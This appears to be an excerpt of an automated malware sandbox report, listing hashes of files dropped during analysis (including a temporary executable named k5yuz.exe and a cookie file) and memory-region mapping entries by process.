SHA512eaf2a49021a3c399b5503a03ee2bd8407def41b701b83ac05da7dbf163a2283342bb91da97ba2ba45267419204ad4058925aa266b3b8e40b7d1217d469544f45
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\k5yuz.exeMD5
3a44489e428c94ee9a96b81832b17f3c
SHA163b8fa8f63ef4f14e346d407823c88c235435866
SHA2563f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
SHA51276abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22
-
C:\Users\Admin\AppData\Local\Temp\k5yuz.exeMD5
3a44489e428c94ee9a96b81832b17f3c
SHA163b8fa8f63ef4f14e346d407823c88c235435866
SHA2563f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
SHA51276abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WXER6JZL.txtMD5
32189bd906b2deb4cd83b2842386d25c
SHA19196b2ea8c3735bee7520027a8ab5877d10c6035
SHA256bc760efd2699677dba9046f64bd7c3401aeb52b91272c27c8128c39c76ef6d3d
SHA512c75a10021eb13abfe09df5c2afc1b49ccd443e1ccacc1c17ca61208494493c55379873dbf91337a6f600288084e1a0880c4e86ccfa1e7b8e16714c5f1327683d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
cd245c6df282faf6fac7ffa10fa5a4a0
SHA1e0d4649b9ed2c6a2b47560ea4ba4dc5fae8f7fc6
SHA2565186338a9c581e2e7aca065baac64b490b15246e49ed4c4fbe030506bdaf9232
SHA51289c8014496bdce53c6884b7945a025684024088a1a13b0216b49500f1485784ac3f789f86ff4b74fed296db00235287dd7990a6f914ac9b52b51145ad8c04b94
-
\Users\Admin\AppData\Local\Temp\k5yuz.exeMD5
3a44489e428c94ee9a96b81832b17f3c
SHA163b8fa8f63ef4f14e346d407823c88c235435866
SHA2563f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
SHA51276abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22
-
\Users\Admin\AppData\Local\Temp\k5yuz.exeMD5
3a44489e428c94ee9a96b81832b17f3c
SHA163b8fa8f63ef4f14e346d407823c88c235435866
SHA2563f0e1c440afaaa9e676c701415d848b6f943d8d3a0436802e835114d993eb80b
SHA51276abb45a8abbcd157f64ec1141b58a93411c3246a1d969778a87ba2dce7ebfadf2678996bf94a14dcb907eac5c4ce572b3f9fc15c1259c6371d07f3f06121c22
-
memory/676-60-0x0000000000000000-mapping.dmp
-
memory/892-2-0x000007FEFB931000-0x000007FEFB933000-memory.dmpFilesize
8KB
-
memory/1108-53-0x0000000000000000-mapping.dmp
-
memory/1108-61-0x0000000002760000-0x0000000002764000-memory.dmpFilesize
16KB
-
memory/1188-6-0x0000000074D91000-0x0000000074D93000-memory.dmpFilesize
8KB
-
memory/1188-5-0x0000000000000000-mapping.dmp
-
memory/1188-22-0x0000000002832000-0x0000000002833000-memory.dmpFilesize
4KB
-
memory/1188-20-0x0000000002830000-0x0000000002831000-memory.dmpFilesize
4KB
-
memory/1188-9-0x0000000071490000-0x0000000071B7E000-memory.dmpFilesize
6.9MB
-
memory/1312-11-0x0000000000000000-mapping.dmp
-
memory/1328-4-0x0000000000000000-mapping.dmp
-
memory/1492-7-0x0000000000000000-mapping.dmp
-
memory/1640-56-0x0000000000000000-mapping.dmp
-
memory/1640-68-0x0000000002590000-0x0000000002594000-memory.dmpFilesize
16KB
-
memory/1656-71-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1656-70-0x00000000003A0000-0x00000000003DC000-memory.dmpFilesize
240KB
-
memory/1656-65-0x0000000000000000-mapping.dmp
-
memory/1656-67-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1696-54-0x0000000000000000-mapping.dmp
-
memory/1868-15-0x0000000001FA0000-0x0000000001FA1000-memory.dmpFilesize
4KB
-
memory/1868-25-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/1868-43-0x00000000063F0000-0x00000000063F1000-memory.dmpFilesize
4KB
-
memory/1868-36-0x0000000006290000-0x0000000006291000-memory.dmpFilesize
4KB
-
memory/1868-35-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1868-34-0x0000000005880000-0x0000000005881000-memory.dmpFilesize
4KB
-
memory/1868-29-0x0000000005750000-0x0000000005751000-memory.dmpFilesize
4KB
-
memory/1868-10-0x0000000000000000-mapping.dmp
-
memory/1868-23-0x0000000002610000-0x0000000002611000-memory.dmpFilesize
4KB
-
memory/1868-21-0x00000000028F2000-0x00000000028F3000-memory.dmpFilesize
4KB
-
memory/1868-19-0x00000000028F0000-0x00000000028F1000-memory.dmpFilesize
4KB
-
memory/1868-17-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/1868-14-0x0000000071490000-0x0000000071B7E000-memory.dmpFilesize
6.9MB
-
memory/1972-3-0x000007FEF7570000-0x000007FEF77EA000-memory.dmpFilesize
2.5MB
-
memory/1992-51-0x0000000000000000-mapping.dmp